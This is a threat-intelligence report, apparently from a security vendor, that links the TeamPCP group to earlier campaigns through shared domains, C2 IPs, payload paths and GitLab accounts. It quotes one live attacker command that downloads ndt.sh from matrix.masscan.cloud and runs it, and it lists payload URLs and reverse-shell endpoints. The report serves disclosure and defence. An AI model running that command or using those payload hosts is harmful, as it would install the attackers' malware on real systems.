OLIGO Security has identified evidence that TeamPCP was
responsible for the first known attack in which AI infrastructure was hijacked
into a self-propagating botnet during the ShadowRay
2.0 campaign. Our findings also link the group to activity previously
attributed to TA-NATALSTATUS dating
back to 2020.
The connection is supported by overlapping domains, malware
deployment paths, staging techniques, backend infrastructure, and operational
tradecraft. Together, these indicators reveal a continuous operational lineage
spanning multiple years and culminating in the actor now publicly known as
TeamPCP.
Our investigation also found previously unattributed TeamPCP
activity months before the group publicly branded itself. During this period,
the operators exploited internet-facing infrastructure across platforms
including Ray, Docker, Redis, and React, before expanding into software supply
chain compromise through GitHub Actions, token theft, and open-source project
abuse.
One of the strongest operational links is the overlap
between the IronErn GitHub and GitLab identities observed during ShadowRay 2.0
and TeamPCP's later infrastructure. Correlating GitLab authentication logs,
command-and-control infrastructure, reverse-shell activity, and malware staging
establishes a direct operational bridge between the ShadowRay 2.0 campaign and
the actor later operating publicly as TeamPCP.
This report presents the findings of our ongoing
investigation, including newly attributed activity, technical analysis, TTPs,
and previously unpublished indicators of compromise (IoCs) associated with
TeamPCP.
Acknowledgments
Throughout the investigation, we collaborated with the teams
at Mandiant and GitLab. Their independent review, technical discussions, and
additional investigative context contributed to a more complete understanding
of the activity described in this report. We appreciate their time and
expertise throughout the investigation.
Important note: GitLab promptly banned the accounts
mentioned within this report.
Background
TeamPCP first emerged publicly through a series of
high-profile software supply chain attacks targeting projects including Trivy,
Checkmarx, and BerriAI/LiteLLM. The actor abused GitHub Actions workflows,
compromised open-source projects, and used stolen credentials to distribute
malicious code while publicly portraying its operations as financially
motivated.
Separately, OLIGO's ShadowRay 2.0 research documented a
large-scale campaign targeting exposed Ray clusters through automated
exploitation, wormable payloads, AI-assisted malware development, and attacks
against internet-facing cloud infrastructure. During that investigation, we
identified activity associated with the IronErn GitHub and GitLab identities,
although the broader relationship between those identities and TeamPCP was not
yet understood.
By correlating ShadowRay 2.0 telemetry with historical
infrastructure previously associated with TA-NATALSTATUS, publicly available
intelligence, and newly identified intelligence, we uncovered a consistent
pattern of shared infrastructure, tooling, and behavior spanning activity
dating back to 2020.
What is New
Our investigation has produced three primary findings that
expand the known history and operational profile of TeamPCP.
TeamPCP-related activity extends back to at least 2020
We identified direct IOC and infrastructure overlap linking
TeamPCP to activity previously attributed to TA-NATALSTATUS between 2020 and
August 2025. Across multiple years of activity, we observed recurring
infrastructure families, staging patterns, malware path conventions, and
command-and-control infrastructure that remained consistent through the
emergence of the TeamPCP identity. The overlap suggests operational continuity
over multiple years, consistent with the same operators, closely affiliated groups,
or shared operational infrastructure, rather than completely unrelated threat
activity.
The actor evolved from opportunistic exploitation into
large-scale supply chain compromise
Our analysis shows that TeamPCP was compromising
internet-facing infrastructure as early as 2020. The actor repeatedly exploited
1-day vulnerabilities affecting platforms including React, Docker, Redis, and
Ray, often using automated and wormable exploitation techniques. Over time, the
operation evolved beyond exploiting exposed services, expanding into software
supply chain attacks through GitHub, GitLab, and token theft. This transition
allowed the actor to leverage legitimate cloud infrastructure while continuing
to reuse long-standing infrastructure and methods.
TeamPCP, IronErn, and ShadowRay 2.0 are operationally
linked
We established a direct connection between TeamPCP and the
IronErn GitHub and GitLab identities active during the 2025 ShadowRay campaign.
TeamPCP can be linked to the IronErn, IronErn440, and least3654 GitLab users,
as well as the thisisforwork440-ops GitHub user, through shared infrastructure,
overlapping post-compromise activity, and common operational artifacts. We also
assess that TeamPCP was responsible for the ShadowRay 2.0 campaign based on our
evidence.
Chain of Events: TeamPCP Timeline (2020-2026)
TA-NATALSTATUS IronErn and the TeamPCP Connection
Between 2020 and late 2025, activity that we assess is
operationally linked to TeamPCP was tracked under multiple names, including
TA-NATALSTATUS and later IronErn. Those names were assigned by defenders based
on observed infrastructure, tooling, and campaigns, while the TeamPCP identity
did not emerge publicly until late 2025.
What is masscan[.]cloud?
One of the strongest infrastructure links identified during
our investigation is the malicious domain masscan[.]cloud. The domain and its
related subdomains appear across activity associated with TA-NATALSTATUS,
IronErn (ShadowRay 2.0) and later TeamPCP operations, serving as a recurring
piece of infrastructure over multiple campaigns.
Certificate transparency records show that both
masscan[.]cloud and matrix.masscan[.]cloud became active on May 11, 2025,
establishing an early footprint for infrastructure that would later appear
throughout TeamPCP operations.
Certificate Transparency Timeline
Cert ID | First Seen | Domain | Cert Authority | Notes |
18348750576 | 2025-05-11 | masscan.cloud | Let’s Encrypt (E6) | Base domain cert |
18348751301 | 2025-05-11 | masscan.cloud | Let’s Encrypt (E6) | Base domain renew |
18349037873 | 2025-05-11 | matrix.masscan.cloud | Let’s Encrypt (E6) | Earliest observed |
18349038225 | 2025-05-11 | matrix.masscan.cloud | Let’s Encrypt (E6) | Renewal |
The certificate history suggests layered infrastructure
rather than a single domain that was purchased. The base domain was registered
through GoDaddy, wildcard certificates were issued through Google Trust
Services, and individual subdomains relied on Let’s Encrypt certificates for
provisioning.
Source: https://crt.sh/?q=masscan.cloud
Beginning in late 2025, the domain expanded beyond a single
malware campaign. Newly observed subdomains indicate infrastructure supporting
financial phishing, credential theft, payment fraud, and testing activity.
Malicious Subdomains Observed Under masscan[.]cloud
First Observed | Subdomain | Purpose | Status |
2025-10-31 | auth.masscan.cloud | Authentication / credential phishing | Active |
2025-11-19 | checkout.masscan.cloud | Checkout page phishing | Unknown |
2025-11-19 | pay.masscan.cloud | Payment phishing | Active |
2025-12-29 | mail.masscan.cloud | Email infrastructure | Unknown |
2026-01-02 | *.bank-phish.masscan.cloud | Banking credential phishing | Unknown |
2026-01-02 | *.test-phish.masscan.cloud | Testing infrastructure | Unknown |
2026-01-02 | *.zendesk.masscan.cloud | Zendesk impersonation phishing | Unknown |
2026-01-02 | test.masscan.cloud | Infrastructure testing | Active |
With several of these subdomains active at the time of
writing, this suggests that masscan[.]cloud served as a persistent operational
platform and not just infrastructure solely dedicated to TeamPCP’s cloud
exploitation campaigns.
The most interesting subdomain is matrix.masscan[.]cloud.
Although registered alongside the parent domain in May 2025, it later appeared
directly inside exploit infrastructure observed in the wild.
Certificate transparency records for
matrix.masscan.cloud.
During our investigation we identified
103.79.77[.]16/ep9TS2/ndt.sh, documented in the wild during June 2025, using
the distinctive /ep9TS2/ndt.sh path. We also identified the malware URL
natalstatus[.]org/ep9TS2/ndt.sh extending the same directory structure into
earlier infrastructure.
ndt.sh payload
hosted on 103.79.77[.]16 and natalstatus[.]org
We then correlated these findings with historical
infrastructure associated with natalstatus[.]org. Public reporting identified
natalstatus[.]org as the primary backend and matrix.masscan[.]cloud as the
backup infrastructure, directly linking the two domains within the same
operational framework.
natalstatus[.]org as the primary backend and
matrix.masscan[.]cloud as the backup backend
To better understand the significance of these findings, we
compared them with CloudSEK's
public research on TA-NATALSTATUS. CloudSEK identified the following artifacts
as core components of the actor's deployment framework:
Shared Infrastructure and Tooling
Artifact | TA-NATALSTATUS | TeamPCP | Significance |
natalstatus.org | Primary backend | Referenced during TeamPCP activity | Shared backend infrastructure |
matrix.masscan.cloud | Backup backend | Active TeamPCP infrastructure | Direct domain overlap |
/EP9ts2/ | Actor IOC | Observed in TeamPCP payloads | Distinctive deployment path |
ndt.sh | Stage 1 implantation | Same filename observed | Shared tooling |
nnt.sh | Stage 1 implantation | Same filename observed | Shared tooling |
is.sh | Preparation script | Same script observed | Shared deployment workflow |
rs.sh | Propagation script | Same script observed | Shared propagation workflow |
Earlier TA-NATALSTATUS campaigns relied on natalstatus[.]org
as the primary backend while matrix.masscan[.]cloud served as the backup
infrastructure. By late 2025, TeamPCP's own GitHub account hosting the PCPcat
malware listed masscan.cloud as its official website, directly associating the
domain with the group.
Timeline of Infrastructure Reuse
Timeframe | Activity | Infrastructure Observed | Significance |
2020–2025 | TA-NATALSTATUS campaigns targeting internet-facing | natalstatus[.]org, /EP9ts2/, ndt.sh, nnt.sh, is.sh, rs.sh | Earliest documented use of the deployment framework |
2025-05-11 | First certificate transparency records | masscan[.]cloud, matrix.masscan[.]cloud | Earliest observable registration of TeamPCP-linked |
June 2025 | Exploit infrastructure observed in the wild | 103.79.77[.]16/ep9TS2/ndt.sh | Same deployment path documented outside the original |
Mid–Late 2025 | ShadowRay 2.0 / IronErn activity | masscan[.]cloud, matrix.masscan[.]cloud | Same infrastructure reused during a separate campaign |
Late 2025 | TeamPCP publicly emerges | GitHub account lists masscan.cloud as official website | Public association between the actor and the |
Late 2025–2026 | Expansion of operational infrastructure | auth.masscan[.]cloud, pay.masscan[.]cloud, | Infrastructure evolves beyond a single exploitation |
July 2025: Newly-Attributed TeamPCP Activity
On July 26, 2025, a compromised Ray cluster logged the
following command:
wget https://matrix.masscan.cloud/ep9TS2/ndt.sh &&
chmod +x ndt.sh && ./ndt.sh
The same infrastructure later appeared in PCPcat, TeamPCP
repositories, and subsequent exploitation campaigns, placing TeamPCP-linked
activity approximately five months before the name emerged publicly in December
2025.
Interest in the TeamPCP name did not emerge until
December 2025, despite TeamPCP-linked infrastructure being active since July
2025.
Infrastructure Continues to Appear
The domain registration history supports this timeline.
According to crt.sh, masscan[.]cloud was registered on May 11, 2025,
approximately two months before the Ray payload from July, and remained active
throughout the period covered by our investigation.
Just days after the July 26 payload, matrix.masscan[.]cloud
was publicly reported distributing malware.
URLhaus reporting of malware hosted on
matrix.masscan[.]cloud beginning August 1, 2025.
URLhaus associated the activity with 104.164.55.217, while
historical passive DNS records linked masscan[.]cloud to 213.139.205.74.
Historical passive DNS records for masscan[.]cloud.
Given TeamPCP publicly controlled masscan[.]cloud, we treat
213.139.205.74 as an IOC directly associated with the group. Together, the
certificate transparency records, URLhaus reporting, and passive DNS history
demonstrate that the infrastructure observed during ShadowRay 2.0 was lasting
as it persisted across multiple campaigns and remained tied to TeamPCP as the
group's operations evolved.
September-October 2025: Expanding the TeamPCP Attribution
By late summer and early fall 2025, the scope of the
activity became much clearer. With the context of TeamPCP's historical
infrastructure, our investigation identified additional activity that can now
be attributed to TeamPCP through shared infrastructure, IOCs, and TTPs.
The strongest overlap is the continued reuse of
masscan[.]cloud and 67.217.57.240, a TeamPCP C2 IP. Earlier TA-NATALSTATUS
activity targeting exposed internet-facing services relied on the same
infrastructure, while ShadowRay 2.0 against exposed Ray clusters continued
using those same indicators during September and October. The recurrence of
these unique artifacts across multiple campaigns is one of the strongest links
between the operations.
We also observed multiple reverse shells connecting to
67.217.57.240:666 and masscan[.]cloud from compromised systems. The progression
of payloads outlined below demonstrates a consistent operation.
Payload Evolution
Date | Payload | Infrastructure |
July 26, 2025 | masscan.cloud/ep9TS2/ndt.sh | masscan.cloud |
September 21, 2025 | 67.217.57.240:666/files/netsh | 67.217.57.240 |
September 26, 2025 | 67.217.57.240:666/files/netsh | 67.217.57.240 |
September 28, 2025 | 67.217.57.240:666/files/netsh | 67.217.57.240 |
October 2, 2025 | 67.217.57.240:666/files/keyen.sh | 67.217.57.240 |
Our research shows that TeamPCP maintained control of this
infrastructure between July 26 and December 25, 2025, with the same domains,
VPSs, and IP addresses continuing to support exploitation across later
React2Shell, Docker, and other TeamPCP campaigns.
We also identified 44.252.85.168:666 serving payloads using
the identical /files/
hosted on 67.217.57.240:666. The infrastructure appears to have evolved while
preserving the same operational model. One possible explanation is that
67.217.57.240 had already been publicly disclosed during the ShadowRay 2.0
investigation, prompting the operators to migrate while retaining their
deployment framework.
October also provides another important historical link.
During attacks against exposed Redis servers captured by honeypots, the same
masscan[.]cloud domain and ndt.sh deployment framework reappeared. The
distinctive /EP9ts2/ directory structure had already been documented across
multiple IP addresses and domains over several years, reinforcing the
infrastructure lineage established earlier in this report.
Taken together, the September and October activity
demonstrates that TeamPCP reusing the same infrastructure, payloads, and
operational patterns across attacks targeting Ray clusters, Redis servers,
Docker environments, and later React2Shell victims. This continuity strongly
supports our assessment that TeamPCP represents the continuation (or
rebranding) of an existing ecosystem.
November 2025: ShadowRay 2.0 and the IronErn Connection
By November 2025, TeamPCP was already very active, even
though the group's public name wasn’t released yet.
One of the strongest examples came from compromised Ray
clusters, where we observed long-lived reverse shells connected to
67.217.57.240:666, the TeamPCP command-and-control server mentioned.
root 1667804 1 0 Sep21
./netsh root 2471383 1 0 Sep26 ./netsh
These reverse shells remained active from September 21 and
September 26 through November 2, demonstrating that TeamPCP maintained
persistent access to compromised systems weeks before the group began publicly
using TeamPCP branding.
This period also provides one of the strongest operational
links between ShadowRay 2.0 and the operators behind the infrastructure.
One of the key ShadowRay 2.0 indicators was 103.127.134.124,
which received reverse shell connections from compromised Ray clusters. Data
provided by GitLab shows that the same IP address was also used to authenticate
to GitLab by the accounts ironern440 and least3654, which hosted the
command-and-control scripts used during the campaign.
This was not simply shared hosting or overlapping
infrastructure. The timeline shows the same IP serving both operational roles:
November 16 103.127.134.124:30987 receives reverse shells
from Victim 2
Date | Activity |
October 15–November 2 | 103.127.134.124:30654 receives reverse shells from Victim |
November 2 | All reverse shells on Victim 1 terminate simultaneously |
November 2–November 4 | ironern440 authenticates to GitLab from 103.127.134.124 |
November 16 | 103.127.134.124:30987 receives reverse shells from Victim |
This timeline demonstrates a direct operational intersection
between the infrastructure used to manage compromised Ray clusters and the
GitLab accounts hosting the campaign's tooling. The same IP address was
simultaneously involved in active post-compromise access and the management of
the supporting command-and-control infrastructure.
December 2025: TeamPCP Emerges Publicly with PCPcat
By December 2025, TeamPCP's public identity had become much
clearer. The group's first major operation under the TeamPCP name, PCPcat,
peaked around Christmas 2025, targeting React2Shell-vulnerable applications and
exposed Docker APIs with ransomware.
Public reporting from the time noted that the group itself
claimed to have "rebranded" in late 2025, implying earlier operations
under different names before consolidating under the TeamPCP identity. That
public statement closely aligns with our findings.
PCPcat marks the point at which an already active threat
actor adopted a consistent public identity. By then, the same infrastructure,
deployment framework, and operational patterns had already been observed across
multiple campaigns and, through the historical infrastructure links presented
in this report, appear to extend back even further.
January-February 2026: Cloud Exploitation to Crimeware
By early 2026, the infrastructure documented through this
investigation remained active. During February, masscan[.]cloud again resolved
to 44.252.85.168 and 67.217.57.240.
During this period, the group expanded its exploitation to
include CVE-2025-29927 and CVE-2025-55182, targeting a broad range of
internet-facing technologies including AWS, Anyscale’s Ray, Docker, Kubernetes,
Linux, Meta React, Microsoft Azure, Redis, and Vercel Next.js.
Operating openly under the TeamPCP name, the group
increasingly transformed exposed internet-facing systems into persistent
crimeware infrastructure. This represented an evolution from the tactics
observed during ShadowRay 2.0 and earlier. The same wormable propagation
techniques, reverse-shell deployment, and post-compromise persistence that had
previously targeted Ray clusters were now being applied across a much broader
range of technologies. The 2026 campaigns demonstrate an escalation of a
previously established model.
March 2026: Expansion into Software Supply Chains
By March 2026, TeamPCP had expanded beyond exploiting
exposed infrastructure and into the software supply chain attacks that
contributed to the majority of their notoriety - such as attacks affecting
Trivy, Checkmarx, and BerrAI/LiteLLMd, with downstream victims impacted through
compromised development workflows.
The infrastructure evolved alongside these operations.
Certificate transparency records show staging infrastructure including
scan.aquasecurity.org on March 17, 2026, followed by checkmarx.zone on March
22, 2026, documenting the infrastructure supporting this phase of activity.
Although the targets had changed, the broader pattern had
not. The same actor that previously focused on exposed cloud workloads and
internet-facing services was now applying the same operational discipline to
GitHub repositories, software pipelines, and credential theft. The
infrastructure continued to evolve, but the underlying methods stayed
consistent.
March 2026: Evolution of kube.py
One of the most notable changes observed during March 2026
appeared in kube.py, a second-stage payload used after compromising Kubernetes
environments. Earlier versions of the script focused on propagation, checking
the cluster, spreading to additional pods, and deploying a DaemonSet to
establish persistence across the environment.
By March 26, 2026, the same script had evolved to include a
destructive code path. The updated version checked whether the victim system
was configured for the Iran timezone and, if so, deployed a destructive
DaemonSet or executed a poison_pill() routine that deleted filesystems and
rebooted the machine.
Because internet connectivity within Iran was heavily
disrupted during the period, external visibility into affected systems was
significantly limited, making it difficult to independently assess how widely,
or whether, the destructive code path was ultimately deployed.
Source: https://netblocks.org
April 2026
By April 2026, masscan[.]cloud had shifted from the TeamPCP
command-and-control IP 67.217.57.240 to 6.6.6.6.
The change appears to reflect an infrastructure
reorganization. Supporting services remained active: auth.masscan[.]cloud
retained a valid wildcard certificate, pcp.masscan[.]cloud redirected to the
group’s Telegram channel, and matrix.masscan[.]cloud continued resolving
through Cloudflare.
This suggests the infrastructure was reorganized. While the
base domain no longer resolved to the original command-and-control server, the
supporting infrastructure remained operational and continued to expose the same
ecosystem observed throughout the preceding campaigns.
One additional observation from this period is a public
statement posted by the TeamPCP account on April 3, 2026:
We do not interpret this statement as evidence that the
referenced "partners" are TA-NATALSTATUS, IronErn, or any other
specific actors discussed in this report.
Final Interpretation
Our investigation indicates that TeamPCP did not emerge in
late 2025. Instead, the evidence points to a longer operational history
spanning multiple campaigns that were previously tracked under names including
TA-NATALSTATUS and IronErn.
By correlating certificate transparency records, passive DNS
data, malware payloads, backend infrastructure, GitHub and GitLab activity,
command-and-control infrastructure, and campaign telemetry, we identified
previously unattributed TeamPCP-linked activity and infrastructure dating back
to 2020.
The cumulative overlap of shared infrastructure, deployment
frameworks, malware tooling, backend architecture, staging scripts,
command-and-control infrastructure, and operational timelines supports our
assessment.
Whether this continuity reflects a direct rebrand, a shared
operator set, or close collaboration between historically related actors cannot
be determined with 100% certainty. What the evidence does demonstrate is that
TeamPCP represents the continuation of an existing operational ecosystem rather
than an entirely new threat actor that appeared in late 2025.
